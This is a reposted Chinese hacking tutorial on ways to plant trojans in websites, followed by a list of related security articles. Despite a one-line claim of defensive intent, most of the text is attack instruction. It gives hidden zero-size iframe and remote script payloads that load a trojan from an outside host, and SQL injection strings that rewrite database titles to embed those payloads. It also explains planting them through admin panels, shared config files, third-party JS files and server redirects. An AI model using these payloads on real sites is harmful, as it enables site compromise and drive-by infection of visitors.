[转载]多姿多彩的网站挂马方式

简介:
信息来源:黑客基地

--------------------------------------------------------------------------
先说明一点,不是怎么教大家挂马,是让你学会挂马,怎么防守,怎么找马,怎么找关键字,怎么让你学会别人是通过什么方法挂到你的网站上的..
有利就有弊,随便怎么看吧。
--------------------------------------------------------------------------

这里我拿挂首页index.asp来举例子。

先说一说,得到webshell的挂马方法
一般的挂马的都是用框架,这是最基本的挂马方式,只要不破坏原有的语言逻辑,那就想插入哪里就写哪里了,最基本的语句当然是<iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>,其中
[url]http://www.fucksb.net/mm.htm[/url] 是我们的木马,下面就不一个一个提示了。
  
上面可能是一般的挂马方式,也是初学者的玩法,好了,再说深一点点的,那就是js文件,好多网站上,你查看源代码都会调用js文件,其中的语句为<script language=javascript src=./ad/ad.js></script>,想到了什么,这里也可以挂马,其中我们可以远程调用自己的js,比如:<script language=javascript src=http://www.fucksb.net/mm.js></script>这个mm.js就可以写木马了,怎么写呢,同样,我们还用最基本的iframe框架,不过在<script></script>之中可识别语言不是html,那怎么办呢,follow me,js文件可以这样写:document.write("<iframe <iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>");,这种形势,这时就可以执行此js中的代码了,当然了,说白了,其实全语句就是<script language=javascript>document.write("<iframe <iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>")</script>呵呵。。

聪明的你可能发现了一点,好像不止是js文件哦~,只要在<script></script>之中,无论什么后缀的文件,只要里面写的语句可以被javascript识别就会执行,对的,比如<script src=http://www.fucksb.net/mm.test></script>,又如<script src=http://www.fucksb.net/mm.lala></script>管他的后缀是什么,只要里面写的语句正确就会被执行了。

  同样,如果首页调用其它网站,或者次级目录中的htm,asp等如:<iframe src=./ad/news.htm width=300 height=200></iframe>
也可以在news.htm文件里挂马,可以是htm和js,随便哪种,这是比较隐蔽的玩法,这些适用于主页没有写权限的方法。

<script>同<iframe>2个相比较,好处是script整体挂马的代码长度比iframe小得多,很实用。说实用是在数据库方面,下面介绍。

    数据库挂马,这里我们拿mssql数据库为例子。

这里说的是首页调用到的数据库,比如新闻,论坛,公告,等等,一般是标题。这些需要经验去检测,举个例子,比如首页有一条新闻为:“明日开业”,那么鼠标点此新闻,地址栏打开的新窗口为news.asp?id=1,这种情况,这时,就可以判断此新闻是从数据库中调用的了,当然了,我们不说access,只说mssql。
首页,我们要有这个网站中的一个注入点,比如就点在vote.asp?id=123,同时,至少是Db_owner权限,这时如果要挂马可以不用取到webshell,因为如果我们的目的只在于挂马的话,而且有时,还得检测mssql数据库和web服务器不在同一个机器上,那挂马的方式就是更改数据库内容,这里我说的就是这种,如上面说的,首页显示的一条新闻标题为“明日开业”,如果首页显示的标题是“明日开业</a><iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>”,那这样的话,首页就会执行这段代码了,像这种情况,找到了注入点,就得找表名,如此新闻的表名为news,字段为title,id,等等,根据猜测,id=1时,暴出的字段title的值就为“明日开业”,那么90%就可以猜到了,首页调用的数据库的字段就为news表中的title,这时在注入点,可以大胆提交vote.asp?id=123;update news set title='明日开业</a><iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>' where id=1;--,这样就可以更改数据库了,前提是最少要少db_owner权限,当然也有时由于代码原因,也可以这样提交:vote.asp?id=123';update news set title='明日开业</a><ifrmae src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>' where id=1 and '1'='1,也可以...
这种方法是有问题的,实战中存在不少问题,因为一般的情况下,标题都是通过<table>来限制宽度,也就是说如果你的标题的长度超过了指定的长度,那么你的代码只能写一半,这样就不能执行了,所以挂马最好的方法是用<script>这种方法来挂马了,如:
vote.asp?id=123;update news set title='明日开业</a><script src=http://www.fucksb.net/mm.js></script>' where id=1;--长度有很大的减少,很不错。
  
  后台挂马
  通常注入等不到webshell,就只能靠进后台挂马。

  这里说的是进入了后台,但不能通过后台得到webshell,这时要仔细关察后台,像比较网站的链接、顶部底部的广告、都可以直接写入你的木马代码,等等,后台是灵活的,具体问题具体分析。不过有一点很重要,是不要打乱前台htm源文件里的代码逻辑,比如应该闭合前面的<a><img>"( 等这些符号,应该先闭合掉如</a></img>")。

  其它形式

  如一首页调用了<iframe src="http://blog.77169.com/vote.asp?id=1&";no=view width=100></iframe>此种形势,一样可以在vote.asp中直接写入iframe木马代码,如果调用的是<script src="http://blog.77169.com/vote.asp?id=1&";no=view width=100></script>在vote.asp写代码时,请用document.write("")这种格式写入,当然,如果被挂文件中还有调用的文件可以继续往深处写,如果你够狠的话,直接写到数据库配置文件中,如conn.asp,这样好多页面可以同时挂上你的一种木马了。
  当然这里也有js文件,一样原理。
  挂一个网站的马,不一定就得攻入他,有时没有方法的同时,可以考虑跨站。好多站用了别的站的js文件,如:<script src=http://www.163.com/user.js>这种情势,这时就可以考虑只拿163.com的权限就行了,只要能修改到user.js文件就可以挂到你要挂的站点了,同理,也有<iframe src=http://www.163.com/user.htm>此种情况,一样道理,剑走偏锋,达到目的,无论用什么招数了。
  
  服务器挂马
  这里简单说一个比较狠的吧.

  重定向任何调用的htm,js,等文件.













本文转自loveme2351CTO博客,原文链接: http://blog.51cto.com/loveme23/8534,如需转载请自行联系原作者



相关文章
|
安全 Linux 网络安全
渗透攻击实例-黑客大佬们都浏览哪些网站?
渗透攻击实例-黑客大佬们都浏览哪些网站?
渗透攻击实例-黑客大佬们都浏览哪些网站?
|
Web App开发 安全 JavaScript
WordPress建站之如何从恶意重定向恶意软件黑客攻击中恢复
关于WordPress建站的问题,欢迎留言讨论,关注“六翼开源”专注WordPress建站服务。
WordPress建站之如何从恶意重定向恶意软件黑客攻击中恢复
|
安全 网络协议 5G
网站被攻击打不开页面如何解决
我的网站流量呈上升的趋势,经常被同行恶意攻击,但是我的网站还是没有垮,我就详细给遇到和我同样问题的朋友们分享我的网站到底是如何防御住黑客攻击的,因为正常的情况下,我们的客户端发送请求到达服务器端,如果你服务器没有处理好高频并发访问的话,很有可能被别人攻击,一旦被攻击之后,有可能你的服务器会瞬间CPU标高,标高之后,整个服务器直接瘫了垮了,那我们到底应该怎么去防御这种情况。
298 0
网站被攻击打不开页面如何解决
|
安全 搜索推荐
网站快照收录被黑客攻击劫持跳转
我们普通用户一般很难发现,今天有一个客户咨询我,说为什么他的一个网站的信息显示在一个菠菜网站上?我说这是人家利用了你的网站数据后被搜索引擎收录而留下的一个快照,快照是你的信息,打开却是违法信息,还有一种情况是快照是非法信息,而打开却是正常的网站信息,这种情况一般是网站被挂马或者域名遭到了劫持,在你 site搜索某个网站域名的时候,发现标题描述关键词全部被改掉了,点击以后会进入一个非法的网站页面,它替换掉了你被搜索引擎收录的快照信息并做了跳转,如果你自己在浏览器地址栏输入网址进去,并不会发现问题的所在,这种情况并不会直接破坏掉你网站的信息。
190 0
网站快照收录被黑客攻击劫持跳转
|
SQL 缓存 监控
网站老是被劫持到其他网站怎么办
越来越多的网站被劫持,像跳转到彩piao网站,du博网站的情况时有发生,很多人可能都会经历过,电脑打开网站,以及手机打开移动端网站都会跳转到其他网站上去,这个就是网站被劫持跳转,那么网站被跳转的背后究竟是因为什么呢? 攻击者为何要劫持跳转到其他网站呢?SINE安全公司针对于这些安全情况,分析为什么网站首页会被篡改,会跳转,道高一尺魔高一丈,才能解决问题。
976 0
网站老是被劫持到其他网站怎么办
|
安全 JavaScript
网站安全防护之被恶意跳转博彩木马排查
访问站点只要后面目录带apk(不管是文件还是目录),就会判断请求头,如果为手机移动端的请求头,就会跳转到博彩网站,如果是电脑PC浏览器,就会弹空白页访问站点,让你看不到跳转后的网址,只要域名后面地址带apk(不管是文件还是目录),就会判断请求头,如果为手机移动端的请求头,就会跳转bc网站,如果是电脑浏览器,就会弹空白页,最近也加上客户订单越来越少,领导也是着急,很大一部分客户渠道来源都从百度点击来的,静下心来看看网站到底是怎么回事,不看不要紧,简直吓我一跳。网站在百度里的收录增加许多,本来以为是更新的文章导致的,可是仔细一想也没那么多的收录呀,site:网站,点击到十页以后竟然发现了问题的关键
412 0
网站安全防护之被恶意跳转博彩木马排查
|
SQL 缓存 安全
WordPress 站点地址被恶意篡改的防护方案讨论
关键词:WordPress,篡改,挂马,恶意,攻击,注入,跳转,重定向,网址,siteurl,home,url,hacked,jump,redirect 摘要:WordPress 站点稍有不慎就有可能受到恶意攻击。一种常见的手段是通过篡改站点的地址,用户访问网站时将会被重新定向到恶意网站。长老将分析两种常见的攻击手段:修改文件和修改数据库,并分享一些安全防护的小技巧。
638 0
|
云安全 安全
瑞星首推“恶意网站监测网” 每天500万网民访问挂马网站
1月8日,瑞星宣布推出“恶意网站监测网(http://mwm.rising.com.cn/)”,这是国内首个专门针对挂马网站、钓鱼网站等互联网威胁的实时监测系统,所有政府机构、企业和个人用户都可以免费浏览该网站,全面、清晰地了解国内网站被黑客“挂马”的情况。
1071 0
|
安全 PHP
dedecms网站被黑 劫持到其他网站如何解决
前段时间网站被黑了,从百度打开网站直接被劫持跳转到了cai票,du博网站上去,网站的首页index.html文件也被篡改成一些什么北京sai车,pk10,一些cai票的关键词内容,搞得网站根本无法正常浏览,从百度搜索我们公司网址,直接被百度拦截,提示什么:百度网址安全中心提醒您:该页面可能存在违法...
4008 0